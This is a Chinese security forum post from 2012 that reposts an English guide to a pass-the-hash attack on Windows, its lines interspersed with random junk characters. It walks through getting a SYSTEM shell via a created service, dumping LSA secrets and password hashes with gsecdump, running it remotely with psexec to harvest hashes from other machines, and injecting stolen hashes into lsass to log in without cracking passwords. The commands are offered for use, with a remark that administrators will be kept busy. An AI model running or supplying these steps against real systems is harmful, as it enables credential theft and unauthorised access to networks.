找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2071|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
o get a DOS Prompt as NT system:
  a+ l) F# e2 [" {- b2 V2 j6 m* A
3 |# s3 g+ I4 w+ CC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact. D7 |' Z( ]; {
[SC] CreateService SUCCESS+ K  y7 a% R  r* i1 W6 {* l
( h- y& H6 t0 h
C:\>sc start shellcmdline, \& q$ B9 S, m& ]( r4 b( x
[SC] StartService FAILED 1053:- T# R0 C7 r/ w. {/ x: F

2 l. J2 }9 M0 P7 JThe service did not respond to the start or control request in a timely fashion.* w/ T/ p% p4 E

7 T, R0 m% h) \0 wC:\>sc delete shellcmdline
6 l* n* b$ i- J) a3 B- S5 K& k$ y[SC] DeleteService SUCCESS
6 `# L6 O2 W! g3 s1 e1 [" |5 u1 ?7 O9 C# n0 b& D$ t6 P# X% B
------------
/ i3 X5 w' N* g( {# Y$ B
9 ~4 v* K9 J- |Then in the new DOS window:) C0 W2 \  ?% `3 Z: f

9 u5 P: _; ~! p4 }Microsoft Windows XP [Version 5.1.2600]
& }9 J: l1 K. |0 E(C) Copyright 1985-2001 Microsoft Corp.
1 Y- G# p2 s8 m
/ Z0 n$ m/ M, b% B; t% E: yC:\WINDOWS\system32>whoami+ s' j, m0 e: h$ Q& U& U& X1 b  m
NT AUTHORITY\SYSTEM
) j- q, j1 V/ |! |! G! H
" b% {1 _0 ^7 z. MC:\WINDOWS\system32>gsecdump -h/ J* `$ H6 u1 T# {) y
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)0 ]9 F% z+ k  O5 v5 D
usage: gsecdump [options], l4 A- o) k; Q2 |) Y
: N$ c4 e  j7 P- E. l6 M5 H( g0 I4 y- `
options:
6 F, b8 q! `& _, s- F-h [ --help ] show help& Q! u0 r4 ?. T) ]
-a [ --dump_all ] dump all secrets
5 `, ]! U8 _- C8 C* g5 p-l [ --dump_lsa ] dump lsa secrets  j8 r' o9 b0 m! I" N0 [/ o% Y$ Q
-w [ --dump_wireless ] dump microsoft wireless connections
& e5 v7 a3 R' \5 e% o% k% P3 U-u [ --dump_usedhashes ] dump hashes from active logon sessions
) h, D/ n$ D* N! N. C) v-s [ --dump_hashes ] dump hashes from SAM/AD
0 s8 X. B3 {# f6 K& b
/ B' y& \, U* Q/ O# l0 n3 hAlthough I like to use:
8 }3 \+ f' K  k7 p% ?( G0 Z* n; c1 o) Z6 g
PsExec v1.83 - Execute processes remotely
) r7 P/ D7 z3 Z# FCopyright (C) 2001-2007 Mark Russinovich
% t8 z/ r; q* a$ ^* USysinternals - 链接标记[url]www.sysinternals.com[/url]
( ]) e9 s2 F% G0 Z, u; x& N3 \! G; o/ N. ?$ V! a! y" q, h
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT8 \) P1 g* k$ o- V* u5 g  N
. t) I. |% B1 i9 y
to get the hashes from active logon sessions of a remote system.7 N, k" I* _- [2 S. p

* y$ @0 c2 `! T, o& wThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
1 W0 [( s7 j/ {$ d! W/ d( M- k5 n8 v$ Q$ w' K# z& b
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
" k- t3 w( o! t原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]. ?  ^; S/ P0 d, n' r

7 t: ?5 m, ~4 i6 y3 |5 V我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。0 v# v2 ]* P8 b0 f0 C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表